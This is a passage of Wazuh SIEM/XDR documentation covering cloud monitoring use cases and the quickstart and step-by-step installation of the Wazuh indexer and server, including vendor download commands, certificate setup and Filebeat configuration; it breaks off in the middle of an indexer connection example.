Wazuh has a GitHub module that uses the GitHub API to pull GitHub audit logs, which contain information about actions performed by organization members. These logs include essential details such as the user who initiated the action, the nature of the action (for example, repository creation or access changes), and the timestamp indicating when the action took place, among other fields. Wazuh collects, processes, and stores these logs, enabling analysis, alerting, and reporting. Refer to Using Wazuh to monitor GitHub for more information.

Protect cloud-native applications

Wazuh provides protection for cloud-native applications, safeguarding them against security threats and vulnerabilities. It integrates with container orchestration platforms like Kubernetes and Docker, allowing it to monitor and analyze container activity in real time. Wazuh detects suspicious container behavior, unauthorized image changes, and potential security misconfigurations, ensuring the overall integrity of containerized applications.

The image below shows alerts generated from a monitored Docker infrastructure.

Docker infrastructure alerts

Some additional use cases for using Wazuh to monitor cloud-native applications are:

Furthermore, the Wazuh integration with cloud service providers enables monitoring and analysis of cloud-native application logs, ensuring comprehensive visibility into the environment and facilitating effective security operations.

Promote security operations in the cloud

Wazuh promotes security operations within cloud environments by allowing security teams to detect and respond to threats, mitigate damage, and reduce the overall impact on the cloud infrastructure. Furthermore, Wazuh facilitates red and blue team activities. The platform's customizable rules help organizations test their security defenses against simulated attacks. Blue teams can use the insights gained in Wazuh from red team activities to fine-tune their security measures and strengthen their defenses. The following resources demonstrate how to use the Stratus Red Team tool to simulate attacks on some cloud platforms and how to detect them with Wazuh:

Detection results

The centralized logging and reporting capabilities of Wazuh simplify compliance management within cloud environments. It helps organizations meet regulatory requirements by capturing and storing audit trails, ensuring accountability, and facilitating the investigation of security incidents. Refer to the Wazuh dashboard documentation for more information about how Wazuh aids analysis, reporting, and compliance efforts.

Quickstart

Wazuh is a security platform that provides unified XDR and SIEM protection for endpoints and cloud workloads. The solution is composed of a single universal agent and three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. For more information, check the Getting Started documentation.

Wazuh is free and open source. Its components abide by the GNU General Public License, version 2, and the Apache License, Version 2.0 (ALv2).

This quickstart shows you how to install the Wazuh central components, on the same host, using our installation assistant. You can check our Installation guide for more details and other installation options.

The section below covers the requirements for installing Wazuh, including the recommended hardware and the supported operating systems.

Requirements

Hardware

Hardware requirements highly depend on the number of protected endpoints and cloud workloads. This number can help estimate how much data will be analyzed and how many security alerts will be stored and indexed.

Following this quickstart implies deploying the Wazuh server, the Wazuh indexer, and the Wazuh dashboard on the same host. This is usually enough for monitoring up to 100 endpoints and for 90 days of queryable/indexed alert data. The table below shows the recommended hardware for a quickstart deployment:

Agents    CPU       RAM      Storage (90 days)
1–25      4 vCPU    8 GiB    50 GB
25–50     8 vCPU    8 GiB    100 GB
50–100    8 vCPU    8 GiB    200 GB

For larger environments we recommend a distributed deployment. Multi-node cluster configuration is available for the Wazuh server and for the Wazuh indexer, providing high availability and load balancing.

Operating system

The Wazuh central components require a 64-bit Intel, AMD, or ARM Linux processor (x86_64/AMD64 or AARCH64/ARM64 architecture) to run. Wazuh recommends any of the following operating system versions:

  • Amazon Linux 2, Amazon Linux 2023

  • CentOS Stream 10

  • Red Hat Enterprise Linux 7, 8, 9, 10

  • Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04

Installing Wazuh

  1. Download and run the Wazuh installation assistant.

    $ curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh && sudo bash ./wazuh-install.sh -a
    

    Once the assistant finishes the installation, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
        User: admin
        Password: <ADMIN_PASSWORD>
    INFO: Installation finished.
    

    You now have installed and configured Wazuh.

  2. Access the Wazuh web interface with https://<WAZUH_DASHBOARD_IP_ADDRESS> and your credentials:

    • Username: admin

    • Password: <ADMIN_PASSWORD>

When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. This is expected; you can accept the certificate as an exception or, alternatively, configure the system to use a certificate from a trusted authority.
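
If you want to confirm that the Wazuh central components are up and running, you can check their services. This is an optional sanity check, using the service names that appear later in this guide:

$ sudo systemctl status wazuh-manager wazuh-indexer filebeat wazuh-dashboard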

Note

You can find the passwords for all the Wazuh indexer and Wazuh API users in the wazuh-passwords.txt file inside wazuh-install-files.tar. To print them, run the following command:

$ sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt

If you want to uninstall the Wazuh central components, run the Wazuh installation assistant using the option -u or --uninstall.
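
For example, assuming the wazuh-install.sh script is still in your working directory:

$ sudo bash ./wazuh-install.sh --uninstall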

Note

Recommended action: Disable Wazuh updates.

We recommend disabling the Wazuh package repositories after installation to prevent accidental upgrades that could break the environment.

Execute the following command to disable the Wazuh repository:

# sed -i "s/^enabled=1/enabled=0/" /etc/yum.repos.d/wazuh.repo
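
The command above applies to RPM-based systems. On Debian-based systems, the equivalent is to comment out the repository entry, as the step-by-step sections later in this guide do:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update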

Next steps

Now that your Wazuh installation is ready, you can start deploying the Wazuh agent. This can be used to protect laptops, desktops, servers, cloud instances, containers, or virtual machines. The agent is lightweight and multi-purpose, providing a variety of security capabilities.

Instructions on how to deploy the Wazuh agent can be found in the Wazuh web user interface, or in our documentation.

Installation guide

Wazuh is a security platform that provides unified XDR and SIEM protection for endpoints and cloud workloads. The solution is composed of the Wazuh agent and three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. For more information, check the Getting Started documentation.

Wazuh is free and open source. Its components abide by the GNU General Public License, version 2, and the Apache License, Version 2.0 (ALv2).

In this installation guide, you will learn how to install Wazuh in your infrastructure. We also offer Wazuh Cloud, our software as a service (SaaS) solution. Wazuh Cloud is ready to use, with no additional hardware or software required, reducing the cost and complexity. Check the Wazuh Cloud service documentation for more information and take advantage of the Wazuh Cloud trial to explore this service.

Installing the Wazuh central components

You can install the Wazuh indexer, Wazuh server, and Wazuh dashboard on a single host or distribute them in cluster configurations. Each Wazuh central component supports two installation methods and both methods provide instructions to install the central components on a single host or on separate hosts.

You can check our Quickstart documentation to perform an all-in-one installation. This is the fastest way to get the Wazuh central components up and running.

For more deployment flexibility and customization, install the Wazuh central components by starting with the Wazuh indexer deployment. This deployment method supports both an all-in-one installation and installing components on separate hosts.

Follow this installation workflow:

Installing the Wazuh agent

The Wazuh agent is a single, lightweight monitoring software. It is a multi-platform component that you can deploy to laptops, desktops, servers, cloud instances, containers, or virtual machines. It provides visibility into the monitored endpoint by collecting critical system and application records, inventory data, and detecting potential anomalies.

Select your endpoint operating system below and follow the installation steps to deploy the Wazuh agent.

Packages list

The Packages list section contains all the packages required for installing Wazuh.

Uninstalling Wazuh

In the Uninstalling Wazuh section, you will find instructions on how to uninstall the Wazuh central components and the Wazuh agent.

Installation alternatives

Wazuh provides other installation alternatives as well. These are complementary to the installation methods of this installation guide. You will find instructions on how to deploy Wazuh using ready-to-use machines, containers, and orchestration tools. There is also information on how to install the solution offline, from sources, and with alternative components.

Wazuh indexer

The Wazuh indexer is a highly scalable, full-text search and analytics engine. It indexes and stores alerts generated by the Wazuh server and provides near real-time data search and analytics capabilities. If you want to learn more about Wazuh components, check the Getting started section.

You can install the Wazuh indexer on a single host or distribute it across multiple nodes in a cluster configuration. The cluster configuration provides scalability, high availability, and improved performance.

Check the requirements below and choose an installation method to start installing the Wazuh indexer.

Requirements

Check the supported operating systems and the recommended hardware requirements for the Wazuh indexer installation. Make sure that your system environment meets all requirements and that you have root user privileges.

Hardware recommendations

You can install the Wazuh indexer as a single-node or multi-node cluster.

  • Hardware recommendations for each node

    Component        Minimum                    Recommended
                     RAM (GB)    CPU (cores)    RAM (GB)    CPU (cores)
    Wazuh indexer    4           2              16          8

  • Disk space requirements: The amount of disk space required depends on the generated alerts per second (APS). This table details the estimated disk space needed per agent to store 90 days of alerts on a Wazuh indexer server, depending on the type of monitored endpoints.

    Monitored endpoints    APS     Storage in Wazuh indexer (GB/90 days)
    Servers                0.25    3.7
    Workstations           0.1     1.5
    Network devices        0.5     7.4

    For example, for an environment with 80 workstations, 10 servers, and 10 network devices, the storage needed on the Wazuh indexer server for 90 days of alerts is about 230 GB (80 × 1.5 GB + 10 × 3.7 GB + 10 × 7.4 GB ≈ 231 GB).

Installing the Wazuh indexer using the assisted installation method

Install and configure the Wazuh indexer as a single-node or multi-node cluster on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the assisted installation method. The Wazuh indexer is a highly scalable full-text search engine. It offers advanced security, alerting, index management, deep performance analysis, and several other features.

Wazuh indexer cluster installation

The installation process is divided into three stages.

  1. Initial configuration

  2. Wazuh indexer nodes installation

  3. Cluster initialization

Note

You need root user privileges to run all the commands described below.

Initial configuration

Follow these steps to configure your Wazuh deployment, create SSL certificates to encrypt communications between the Wazuh components, and generate random passwords to secure your installation.

  1. Download the Wazuh installation assistant and the configuration file.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    # curl -sO https://packages.wazuh.com/5.0/config.yml
    
  2. Edit ./config.yml and replace the node names and IP values with the corresponding names and IP addresses. You need to do this for all Wazuh server, Wazuh indexer, and Wazuh dashboard nodes. Add as many node fields as needed.

    nodes:
      # Wazuh indexer nodes
      indexer:
        - name: node-1
          ip: "<indexer-node-ip>"
        #- name: node-2
        #  ip: "<indexer-node-ip>"
        #- name: node-3
        #  ip: "<indexer-node-ip>"
    
      # Wazuh server nodes
      # If there is more than one Wazuh server
      # node, each one must have a node_type
      server:
        - name: wazuh-1
          ip: "<wazuh-manager-ip>"
        #  node_type: master
        #- name: wazuh-2
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
        #- name: wazuh-3
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
    
      # Wazuh dashboard nodes
      dashboard:
        - name: dashboard
          ip: "<dashboard-node-ip>"
    
  3. Run the Wazuh installation assistant with the option --generate-config-files to generate the Wazuh cluster key, certificates, and passwords necessary for installation. You can find these files in ./wazuh-install-files.tar.

    # bash wazuh-install.sh --generate-config-files
    
  4. Copy the wazuh-install-files.tar file to all the servers of the distributed deployment, including the Wazuh server, the Wazuh indexer, and the Wazuh dashboard nodes. This can be done by using the scp utility.
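
    For example, assuming SSH access as root and a placeholder node address:

    # scp ./wazuh-install-files.tar root@<NODE_IP_ADDRESS>: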

Wazuh indexer node installation

Follow these steps to install and configure a single-node or multi-node Wazuh indexer.

  1. Download the Wazuh installation assistant. Skip this step if you performed the initial configuration on the same server and the Wazuh installation assistant is already in your working directory:

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option --wazuh-indexer and the node name to install and configure the Wazuh indexer. The node name must be the same one used in config.yml for the initial configuration, for example, node-1.

    Note

    Make sure that a copy of wazuh-install-files.tar, created during the initial configuration step, is placed in your working directory.

    # bash wazuh-install.sh --wazuh-indexer node-1
    

Repeat this stage of the installation process for every Wazuh indexer node in your cluster. Then proceed with initializing your single-node or multi-node cluster in the next stage.

Note

For Wazuh indexer installation on hardened endpoints with noexec flag on the /tmp directory, additional setup is required. See the Wazuh indexer configuration on hardened endpoints section for necessary configuration.

Cluster initialization

The final stage of installing the Wazuh indexer single-node or multi-node cluster consists of running the security admin script.

  1. Run the Wazuh installation assistant with option --start-cluster on any Wazuh indexer node to load the new certificates information and start the cluster.

    # bash wazuh-install.sh --start-cluster
    

    Note

    You only have to initialize the cluster once, there is no need to run this command on every node.

Testing the cluster installation

Verify that the Wazuh indexer installed correctly and the Wazuh indexer cluster is functioning as expected by following the steps below.

  1. Run the following command to get the admin password:

    # tar -axf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt -O | grep -P "\'admin\'" -A 1
    
  2. Run the following command to confirm that the installation is successful. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and use the password obtained from the output of the previous command:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
    {
      "name" : "node-1",
      "cluster_name" : "wazuh-cluster",
      "cluster_uuid" : "095jEW-oRJSFKLz5wmo5PA",
      "version" : {
        "number" : "7.10.2",
        "build_type" : "rpm",
        "build_hash" : "db90a415ff2fd428b4f7b3f800a51dc229287cb4",
        "build_date" : "2023-06-03T06:24:25.112415503Z",
        "build_snapshot" : false,
        "lucene_version" : "9.6.0",
        "minimum_wire_compatibility_version" : "7.10.0",
        "minimum_index_compatibility_version" : "7.0.0"
      },
      "tagline" : "The OpenSearch Project: https://opensearch.org/"
    }
    
  3. Run the following command to check if the cluster is working correctly. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and enter the password for the Wazuh indexer admin user when it prompts for password:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    

    The command output should be similar to the following:

    ip              heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                               cluster_manager name
    192.168.107.240           19          94   4    0.22    0.21     0.20 dimr      data,ingest,master,remote_cluster_client *               node-1
    
Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Next steps

The Wazuh indexer is now successfully installed, and you can proceed with installing the Wazuh server. To perform this action, see the Installing the Wazuh server using the assisted installation method section.

Installing the Wazuh indexer step by step

Install and configure the Wazuh indexer as a single-node or multi-node cluster following step-by-step instructions. Wazuh indexer is a highly scalable full-text search engine and offers advanced security, alerting, index management, deep performance analysis, and several other features.

The installation process is divided into three stages:

  1. Certificate creation

  2. Wazuh indexer nodes installation

  3. Cluster initialization

Note

You need root user privileges to run all the commands described below.

Certificate creation

Wazuh uses certificates to establish confidentiality and encrypt communications between its central components. Follow these steps to create certificates for the Wazuh central components.

Generating the SSL certificates
  1. Download the wazuh-certs-tool.sh script and the config.yml configuration file. This creates the certificates that encrypt communications between the Wazuh central components.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-certs-tool.sh
    # curl -sO https://packages.wazuh.com/5.0/config.yml
    
  2. Edit ./config.yml and replace the node names and IP values with the corresponding names and IP addresses. You need to do this for all Wazuh server, Wazuh indexer, and Wazuh dashboard nodes. Add as many node fields as needed.

    nodes:
      # Wazuh indexer nodes
      indexer:
        - name: node-1
          ip: "<indexer-node-ip>"
        #- name: node-2
        #  ip: "<indexer-node-ip>"
        #- name: node-3
        #  ip: "<indexer-node-ip>"
    
      # Wazuh server nodes
      # If there is more than one Wazuh server
      # node, each one must have a node_type
      server:
        - name: wazuh-1
          ip: "<wazuh-manager-ip>"
        #  node_type: master
        #- name: wazuh-2
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
        #- name: wazuh-3
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
    
      # Wazuh dashboard nodes
      dashboard:
        - name: dashboard
          ip: "<dashboard-node-ip>"
    

    To learn more about how to create and configure the certificates, see the Certificates deployment section.

  3. Run ./wazuh-certs-tool.sh to create the certificates. For a multi-node cluster, these certificates need to be later deployed to all Wazuh instances in your cluster.

    # bash ./wazuh-certs-tool.sh -A
    
  4. Compress all the necessary files.

    # tar -cvf ./wazuh-certificates.tar -C ./wazuh-certificates/ .
    # rm -rf ./wazuh-certificates
    
  5. Copy the wazuh-certificates.tar file to all the nodes, including the Wazuh indexer, Wazuh server, and Wazuh dashboard nodes. This can be done by using the scp utility.

Wazuh indexer nodes installation

Follow these steps to install and configure a single-node or multi-node Wazuh indexer.

Installing package dependencies
  1. Install the following packages if they are missing:

    # apt-get install debconf adduser procps
    
Adding the Wazuh repository
  1. Install the following packages if missing.

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the packages information.

    # apt-get update
    
Installing the Wazuh indexer
  1. Install the Wazuh indexer package.

    # apt-get -y install wazuh-indexer
    
Configuring the Wazuh indexer
  1. Edit /etc/wazuh-indexer/opensearch.yml and replace the following values:

    1. network.host: Sets the address of this node for both HTTP and transport traffic. The node will bind to this address and use it as its publish address. Accepts an IP address or a hostname.

      Use the same node address set in config.yml to create the SSL certificates.

    2. node.name: Name of the Wazuh indexer node as defined in the config.yml file. For example, node-1.

    3. cluster.initial_master_nodes: List of the names of the master-eligible nodes. These names are defined in the config.yml file. Uncomment the node-2 and node-3 lines, change the names, or add more lines, according to your config.yml definitions.

      cluster.initial_master_nodes:
      - "node-1"
      - "node-2"
      - "node-3"
      
    4. discovery.seed_hosts: List of the addresses of the master-eligible nodes. Each element can be either an IP address or a hostname. You may leave this setting commented if you are configuring the Wazuh indexer as a single node. For multi-node configurations, uncomment this setting and set the IP addresses of each master-eligible node.

      discovery.seed_hosts:
        - "10.0.0.1"
        - "10.0.0.2"
        - "10.0.0.3"
      
    5. plugins.security.nodes_dn: List of the Distinguished Names of the certificates of all the Wazuh indexer cluster nodes. Uncomment the lines for node-2 and node-3 and change the common names (CN) and values according to your settings and your config.yml definitions.

      plugins.security.nodes_dn:
      - "CN=node-1,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-2,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-3,OU=Wazuh,O=Wazuh,L=California,C=US"
      

Note

Firewalls can block communication between Wazuh components on different hosts. Refer to the Required ports section and ensure the necessary ports are open.
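
As an illustration, if the host uses UFW, the default Wazuh indexer ports (9200/tcp for the RESTful API and 9300-9400/tcp for cluster communication) can be opened as follows. Treat this as a sketch and confirm the list in the Required ports section:

# ufw allow 9200/tcp
# ufw allow 9300:9400/tcp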

Deploying certificates

Note

Make sure that a copy of wazuh-certificates.tar, created in the previous stage of the installation process, is placed in your working directory.

  1. Run the following commands, replacing <INDEXER_NODE_NAME> with the name of the Wazuh indexer node you are configuring as defined in config.yml. For example, node-1. This deploys the SSL certificates to encrypt communications between the Wazuh central components.

    # NODE_NAME=<INDEXER_NODE_NAME>
    
    # mkdir /etc/wazuh-indexer/certs
    # tar -xf ./wazuh-certificates.tar -C /etc/wazuh-indexer/certs/ ./$NODE_NAME.pem ./$NODE_NAME-key.pem ./admin.pem ./admin-key.pem ./root-ca.pem
    # mv -n /etc/wazuh-indexer/certs/$NODE_NAME.pem /etc/wazuh-indexer/certs/indexer.pem
    # mv -n /etc/wazuh-indexer/certs/$NODE_NAME-key.pem /etc/wazuh-indexer/certs/indexer-key.pem
    # chmod 500 /etc/wazuh-indexer/certs
    # chmod 400 /etc/wazuh-indexer/certs/*
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/certs
    
  2. Recommended action: If no other Wazuh components will be installed on this node, run the following command to remove the wazuh-certificates.tar file.

    # rm -f ./wazuh-certificates.tar
    

Note

For Wazuh indexer installation on hardened endpoints with noexec flag on the /tmp directory, additional setup is required. See the Wazuh indexer configuration on hardened endpoints section for necessary configuration.

Starting the service
  1. Enable and start the Wazuh indexer service.

    # systemctl daemon-reload
    # systemctl enable wazuh-indexer
    # systemctl start wazuh-indexer
    

Repeat this stage of the installation process for every Wazuh indexer node in your multi-node cluster. Then proceed with initializing your single-node or multi-node cluster in the next stage.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Cluster initialization

The final stage of installing the Wazuh indexer single-node or multi-node cluster consists of running the security admin script.

  1. Run the Wazuh indexer indexer-security-init.sh script on any Wazuh indexer node to load the new certificates information and start the single-node or multi-node cluster.

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh
    

    Note

    You only have to initialize the cluster once, there is no need to run this command on every node.

Testing the cluster installation
  1. Run the following commands to confirm that the installation is successful. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and enter admin as the password when prompted:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
    {
      "name" : "node-1",
      "cluster_name" : "wazuh-cluster",
      "cluster_uuid" : "095jEW-oRJSFKLz5wmo5PA",
      "version" : {
        "number" : "7.10.2",
        "build_type" : "rpm",
        "build_hash" : "db90a415ff2fd428b4f7b3f800a51dc229287cb4",
        "build_date" : "2023-06-03T06:24:25.112415503Z",
        "build_snapshot" : false,
        "lucene_version" : "9.6.0",
        "minimum_wire_compatibility_version" : "7.10.0",
        "minimum_index_compatibility_version" : "7.0.0"
      },
      "tagline" : "The OpenSearch Project: https://opensearch.org/"
    }
    
  2. Run the following command to check if the cluster is working correctly. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and enter admin as the password when prompted:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    

    The command produces output similar to the following:

    ip              heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                               cluster_manager name
    192.168.107.240           19          94   4    0.22    0.21     0.20 dimr      data,ingest,master,remote_cluster_client *               node-1
    
Next steps

The Wazuh indexer is now successfully installed on your single-node or multi-node cluster, and you can proceed with installing the Wazuh server. To perform this action, see the Installing the Wazuh server step by step section.

To uninstall the Wazuh indexer, see Uninstalling the Wazuh indexer.

Wazuh server

The Wazuh server analyzes the data received from the Wazuh agents, triggering alerts when threats or anomalies are detected. It is also used to remotely manage the configurations of Wazuh agents and monitor their status. If you want to learn more about the Wazuh components, check the Getting started section.

You can install the Wazuh server on a single host or distribute it across multiple nodes in a cluster configuration. Multi-node configurations provide high availability and improved performance. When combined with a network load balancer, you can achieve efficient use of its capacity.

Check the requirements below and choose an installation method to start installing the Wazuh server.

Requirements

Check the supported operating systems and the recommended hardware requirements for the Wazuh server installation. Make sure that your system environment meets all requirements and that you have root user privileges.

Hardware requirements

You can install the Wazuh server as a single-node or multi-node cluster.

  • Hardware recommendations

    Component       Minimum                    Recommended
                    RAM (GB)    CPU (cores)    RAM (GB)    CPU (cores)
    Wazuh server    2           2              4           8

  • Disk space requirements

    The amount of data depends on the generated alerts per second (APS). This table details the estimated disk space needed per agent to store 90 days of alerts on a Wazuh server, depending on the type of monitored endpoints.

    Monitored endpoints    APS     Storage in Wazuh server (GB/90 days)
    Servers                0.25    0.1
    Workstations           0.1     0.04
    Network devices        0.5     0.2

    For example, for an environment with 80 workstations, 10 servers, and 10 network devices, the storage needed on the Wazuh server for 90 days of alerts is approximately 6 GB (80 × 0.04 GB + 10 × 0.1 GB + 10 × 0.2 GB ≈ 6.2 GB).

Scaling

To determine if a Wazuh server requires more resources, monitor these files:

  • /var/ossec/var/run/wazuh-analysisd.state: the variable events_dropped indicates whether events are being dropped due to lack of resources.

  • /var/ossec/var/run/wazuh-remoted.state: the variable discarded_count indicates if messages from the agents were discarded.

These two variables should be zero when the environment is working properly. If they are not, you can add nodes to the cluster.
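
As a quick check, you can inspect both counters at once. This is a minimal example that only reads the state files named above:

# grep -E "events_dropped|discarded_count" /var/ossec/var/run/wazuh-analysisd.state /var/ossec/var/run/wazuh-remoted.state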

Installing the Wazuh server using the assisted installation method

Install the Wazuh server as a single-node or multi-node cluster on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the assisted installation method. The Wazuh server analyzes the data received from the Wazuh agents, triggering alerts when it detects threats and anomalies. This central component includes the Wazuh manager and Filebeat.

Wazuh server cluster installation
  1. Download the Wazuh installation assistant. Skip this step if you installed Wazuh indexer on the same server and the Wazuh installation assistant is already in your working directory:

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option --wazuh-server followed by the node name to install the Wazuh server. The node name must be the same one used in config.yml for the initial configuration, for example, wazuh-1:

    Note

    Make sure that a copy of wazuh-install-files.tar, created during the initial configuration step, is placed in your working directory.

    # bash wazuh-install.sh --wazuh-server wazuh-1
    

Your Wazuh server is now successfully installed.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Next steps

The Wazuh server installation is now complete, and you can proceed with installing the Wazuh dashboard. To perform this action, see the Installing the Wazuh dashboard using the assisted installation method section.

Installing the Wazuh server step by step

Install and configure the Wazuh server as a single-node or multi-node cluster following step-by-step instructions. The Wazuh server is a central component that includes the Wazuh manager and Filebeat. The Wazuh manager collects and analyzes data from the deployed Wazuh agents. It triggers alerts when threats or anomalies are detected. Filebeat securely forwards alerts and archived events to the Wazuh indexer.

The installation process is divided into two stages.

  1. Wazuh server node installation

  2. Cluster configuration for multi-node deployment

Note

You need root user privileges to run all the commands described below.

Wazuh server node installation

Follow these steps to install a single-node or multi-node Wazuh server cluster.

Adding the Wazuh repository

Note

If you are installing the Wazuh server on the same host as the Wazuh indexer, you may skip these steps only if the Wazuh repository is already configured and enabled.

  1. Install the following packages if missing.

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the packages information.

    # apt-get update
    
Installing the Wazuh manager
  1. Install the Wazuh manager package.

    # apt-get -y install wazuh-manager
    

Note

Firewalls can block communication between Wazuh components on different hosts. Refer to the Required ports section and ensure the necessary ports are open.
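
For reference, with UFW the ports commonly required by the Wazuh server (1514/tcp for agent communication, 1515/tcp for agent enrollment, 1516/tcp for cluster communication, and 55000/tcp for the Wazuh API) can be opened as shown below. This is a sketch; confirm the exact list in the Required ports section:

# ufw allow 1514/tcp
# ufw allow 1515/tcp
# ufw allow 1516/tcp
# ufw allow 55000/tcp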

Installing Filebeat
  1. Install the Filebeat package.

    # apt-get -y install filebeat
    
Configuring Filebeat
  1. Download the preconfigured Filebeat configuration file.

    # curl -so /etc/filebeat/filebeat.yml https://packages.wazuh.com/5.0/tpl/wazuh/filebeat/filebeat.yml
    
  2. Edit the /etc/filebeat/filebeat.yml configuration file and replace the following value:

    1. hosts: The list of Wazuh indexer nodes to connect to. You can use either IP addresses or hostnames. By default, the host is set to localhost (hosts: ["127.0.0.1:9200"]). Replace it with your Wazuh indexer IP address accordingly.

      If you have more than one Wazuh indexer node, you can separate the addresses using commas. For example, hosts: ["10.0.0.1:9200", "10.0.0.2:9200", "10.0.0.3:9200"]

      # Wazuh - Filebeat configuration file
      output.elasticsearch:
        hosts: ["10.0.0.1:9200"]
        protocol: https
        username: ${username}
        password: ${password}
      
  3. Create a Filebeat keystore to securely store authentication credentials.

    # filebeat keystore create
    
  4. Add the default username and password admin:admin to the secrets keystore.

    # echo admin | filebeat keystore add username --stdin --force
    # echo admin | filebeat keystore add password --stdin --force
    
  5. Download the alerts template for the Wazuh indexer.

    # curl -so /etc/filebeat/wazuh-template.json https://raw.githubusercontent.com/wazuh/wazuh/v5.0.0/extensions/elasticsearch/7.x/wazuh-template.json
    # chmod go+r /etc/filebeat/wazuh-template.json
    
  6. Install the Wazuh module for Filebeat.

    # curl -s https://packages.wazuh.com/5.x/filebeat/wazuh-filebeat-0.5.tar.gz | tar -xvz -C /usr/share/filebeat/module
    
Deploying certificates

Note

Make sure that a copy of the wazuh-certificates.tar file, created during the initial configuration step, is placed in your working directory.

  1. Replace <SERVER_NODE_NAME> with your Wazuh server node certificate name, the same one used in config.yml when creating the certificates. Then, move the certificates to their corresponding location.

    # NODE_NAME=<SERVER_NODE_NAME>
    
    # mkdir /etc/filebeat/certs
    # tar -xf ./wazuh-certificates.tar -C /etc/filebeat/certs/ ./$NODE_NAME.pem ./$NODE_NAME-key.pem ./root-ca.pem
    # mv -n /etc/filebeat/certs/$NODE_NAME.pem /etc/filebeat/certs/filebeat.pem
    # mv -n /etc/filebeat/certs/$NODE_NAME-key.pem /etc/filebeat/certs/filebeat-key.pem
    # chmod 500 /etc/filebeat/certs
    # chmod 400 /etc/filebeat/certs/*
    # chown -R root:root /etc/filebeat/certs
    
Configuring the Wazuh indexer connection

Note

You can skip this step if you are not going to use the vulnerability detection capability.

  1. Save the Wazuh indexer username and password into the Wazuh manager keystore using the wazuh-keystore tool. Replace <INDEXER_USERNAME> and <INDEXER_PASSWORD> with the Wazuh indexer username and password:

    # echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
    # echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password
    

    Note

    The default step-by-step installation credentials are admin:admin

  2. Edit /var/ossec/etc/ossec.conf to configure the indexer connection.

    By default, the indexer settings have one host configured, set to 0.0.0.0 as shown below.

    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
    • Replace 0.0.0.0 with your Wazuh indexer node IP address or hostname. You can find this value in the Filebeat config file /etc/filebeat/filebeat.yml.

    • Ensure the Filebeat certificate and key name match the certificate files in /etc/filebeat/certs.

    If you are running a Wazuh indexer cluster infrastructure, add a <host> entry for each one of your nodes. For example, in a two-node configuration:

    <hosts>
      <host>https://10.0.0.1:9200</host>
